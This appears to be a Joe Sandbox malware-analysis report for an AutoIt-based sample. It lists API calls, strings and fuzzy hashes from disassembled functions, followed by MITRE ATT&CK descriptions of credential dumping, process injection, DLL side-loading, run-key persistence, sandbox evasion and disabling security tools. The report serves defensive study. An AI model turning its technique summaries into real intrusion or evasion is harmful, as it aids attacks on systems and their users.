Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3aa68a27bc79d2b515d56aef3959ac03d8e5ff029027c29db2acd88b59fb3e77
Instruction ID: e6e3000a797022ff84e6d20b6a598dc3cedcfd8a370f293117141c54dcc281ff
Opcode Fuzzy Hash: 3aa68a27bc79d2b515d56aef3959ac03d8e5ff029027c29db2acd88b59fb3e77
Instruction Fuzzy Hash: 63115CB662020AAFDF00EFA8CC45EEA7BB8EB08304F104514F955E2250D734E8609B60

Function 0026CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0026CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0026CDA6

Strings

<local>, xrefs: 0026CD66

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: e9798f595a884257dd6c19c188ea687e4b82a8cc5deeacf02c61535ef0f27759
Instruction ID: 1997f16d2829904aa5f581d25b1a2394943d146f95a0603116b253444ec7386b
Opcode Fuzzy Hash: e9798f595a884257dd6c19c188ea687e4b82a8cc5deeacf02c61535ef0f27759
Instruction Fuzzy Hash: 7311C6752256327AD7386F668C49FF7BE6CEF127A4F204236B18983080D77498A4D6F0

Function 00283429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002834AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002834BA

Strings

edit, xrefs: 0028348F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3ff7482d20dd12ae895e4c519668520da8380b5fa46ee145c1a20a22c6fd4536
Instruction ID: ca18d9ffcf2c7df5e7bb6000087b5a99768438f38e4a6ca543a7e4f0077d988b
Opcode Fuzzy Hash: 3ff7482d20dd12ae895e4c519668520da8380b5fa46ee145c1a20a22c6fd4536
Instruction Fuzzy Hash: 1F11BF79122109ABEF11AE64EC44EBB376AEF05B74F604324F965931D0C771EC619B60

Function 00256C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00256CB6
_wcslen.LIBCMT ref: 00256CC2

Strings

STOP, xrefs: 00256CBC, 00256CC1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: fe185a8a355d09ae019e01468878b423bf59f4ec93d00139ec5229c360aa73bc
Instruction ID: 0621368d5fb67c9898d53adf3fe23bb9a6cdf82a0db1a751cd5e4f204c2ab560
Opcode Fuzzy Hash: fe185a8a355d09ae019e01468878b423bf59f4ec93d00139ec5229c360aa73bc
Instruction Fuzzy Hash: ED01043262052B8ACB21AFFDDC889BF73B4EE617227900925EC5297190FB31D828C654

Function 00251BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Part of subcall function 00253CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00253CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00251C46

Strings

ListBox, xrefs: 00251C10
ComboBox, xrefs: 00251BE5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: be844fe8f9836fcf552e0242796c80a8259e0bb786873dc70ee62e86ffd5992e
Instruction ID: ce9c095a1fd1e0bad458726f9da35da0199e219528142763752fc963070d77f3
Opcode Fuzzy Hash: be844fe8f9836fcf552e0242796c80a8259e0bb786873dc70ee62e86ffd5992e
Instruction Fuzzy Hash: 7901F7756A110866CB08FF90C951BFF77A89F22382F14001AED0667281EB319E3CC6B6

Function 0020A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0020A529

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Strings

,%,, xrefs: 0020A509
3y$, xrefs: 0020A545, 0020A54D, 0020A552

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%,$3y$
API String ID: 2551934079-228761560
Opcode ID: 2e767c86659e6391a3d3cc3b0d8d4164c2f1c9ef89443a3fdde537e0638730dd
Instruction ID: 5ca702f806b1238836e7696d2f44ce5a61626f1cad6cf0dcfe5e0b0335ae3917
Opcode Fuzzy Hash: 2e767c86659e6391a3d3cc3b0d8d4164c2f1c9ef89443a3fdde537e0638730dd
Instruction Fuzzy Hash: 7801F731A20714D7C704FB68AC5BFAD3754AB05750FD00018F601571C3DE909D658A97

Function 00288172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002C3018,002C305C), ref: 002881BF
CloseHandle.KERNEL32 ref: 002881D1

Strings

\0,, xrefs: 0028818A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0,
API String ID: 3712363035-2004440278
Opcode ID: a1beec88a18292f05b44322751bd9faf44d24444d96067411a82d0520b590baa
Instruction ID: ff18f0e5f1b1ee34589e087d5ee9f27016e670ddea92e09c245d8382a5468119
Opcode Fuzzy Hash: a1beec88a18292f05b44322751bd9faf44d24444d96067411a82d0520b590baa
Instruction Fuzzy Hash: D1F082B7651300BEE320BB61BC4DFB77A9CEB04750F008865BB08D51A2D6759E6497F8

Function 0027747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00277493
_wcslen.LIBCMT ref: 002774B9

Strings

3, 3, 16, 1, xrefs: 00277483

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 55e0224027dad1d89022b8bb3b7250c1b946cfc0fe948e89b650e6e08da6d1e0
Instruction ID: 40013a04732c0b384fc9090f30e3934a2dc18f0ed54c699ad96d3175c65ed026
Opcode Fuzzy Hash: 55e0224027dad1d89022b8bb3b7250c1b946cfc0fe948e89b650e6e08da6d1e0
Instruction Fuzzy Hash: 7BE02B06235261109231267A9CD19BF56D9DFD5790714182BF98DC2276EAA48DF193E0

Function 00250B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00250B23

Strings

Error allocating memory., xrefs: 00250B1C
AutoIt, xrefs: 00250B17

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 83b0bc21f883210e5e04f11e6582ccbb16bf4dc601d5408d13aa48f20a1428b1
Instruction ID: a05d27e5a603f341b2ce2d37c29323de17aab98bbaf195d239104cfffa89a102
Opcode Fuzzy Hash: 83b0bc21f883210e5e04f11e6582ccbb16bf4dc601d5408d13aa48f20a1428b1
Instruction Fuzzy Hash: 37E0D8352A531826D32437547C43FC97A848F06B61F200466FB58594C38BF124B00BFD

Function 00210D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0020F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00210D71,?,?,?,001F100A), ref: 0020F7CE

IsDebuggerPresent.KERNEL32(?,?,?,001F100A), ref: 00210D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001F100A), ref: 00210D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00210D7F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c83ca7069daa1210bb8d97b1b1700fd1de1a562f936ade82d246b6975599b276
Instruction ID: a775b1096bbad9606960e0835712da864ab5bb34d14051f1d589ce0ecae1c55f
Opcode Fuzzy Hash: c83ca7069daa1210bb8d97b1b1700fd1de1a562f936ade82d246b6975599b276
Instruction Fuzzy Hash: 34E065742113418BD3709F78F5487427BE0EB14744F00492DE485C6696DBF4E4948BA1

Function 0020E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0020E3D5

Strings

0%,, xrefs: 0020E3B5
8%,, xrefs: 0020E3CA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%,$8%,
API String ID: 1385522511-3109821673
Opcode ID: 10aef984d289ea5728f41d5605d5174f6102e5f6f42bef89f9e9712d19adc5fd
Instruction ID: 472e3ffad7d6d2c5765dc457d968392386ac6e99cbb44070300b63db71f0d1d0
Opcode Fuzzy Hash: 10aef984d289ea5728f41d5605d5174f6102e5f6f42bef89f9e9712d19adc5fd
Instruction Fuzzy Hash: 38E02031434F10CBCF0C9718B698E9D3751AB0536079105E8F519871D39F7058D58944

Function 0024D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0024D220

Strings

%.3d, xrefs: 0024D22B
X64, xrefs: 0024D2A8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 6cae309b9153e658e72243ef99fd42296f12dc69c48a2c0d429ba31b751e3d80
Instruction ID: 0805f65c6159f01d4b27c12e6c3e8448cf5a4b3836e732e6a30b25435bb1aa06
Opcode Fuzzy Hash: 6cae309b9153e658e72243ef99fd42296f12dc69c48a2c0d429ba31b751e3d80
Instruction Fuzzy Hash: 85D01271839209EACB94D6D0DC498B9B3BCBB08341F608452FD0691082D6F4D5286B61

Function 00282322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0028233F

Part of subcall function 0025E97B: Sleep.KERNEL32 ref: 0025E9F3

Strings

Shell_TrayWnd, xrefs: 00282325

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 116c4a45a86d28cd9e4c50d6b335e189f4138c0fc0c5e105a815aa8b47dbf058
Instruction ID: d2d5cc9cd0ea0157f551c78e9232dc886cb9163c09a8f8352584a1b3f988b797
Opcode Fuzzy Hash: 116c4a45a86d28cd9e4c50d6b335e189f4138c0fc0c5e105a815aa8b47dbf058
Instruction Fuzzy Hash: A1D0223A3E1310B7EA6CB330EC0FFC6BA089B00B01F2049127705AA0D0CAF4A805CB24

Function 00282356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028236C
PostMessageW.USER32(00000000), ref: 00282373

Part of subcall function 0025E97B: Sleep.KERNEL32 ref: 0025E9F3

Strings

Shell_TrayWnd, xrefs: 00282365

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 812cea082fd88f8bae477e59ca1b12235e08ba1874ce36c9b33d892c850b6dc6
Instruction ID: 251cb062f230c27d7db914a889a51b6a6cf7b1fb3fba1f00242e0d8bf81645b2
Opcode Fuzzy Hash: 812cea082fd88f8bae477e59ca1b12235e08ba1874ce36c9b33d892c850b6dc6
Instruction Fuzzy Hash: 7ED0A9363D23107AEA68A330AC0FFC6A6089B01B01F2049127601AA0D0CAB4A8058B28

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre
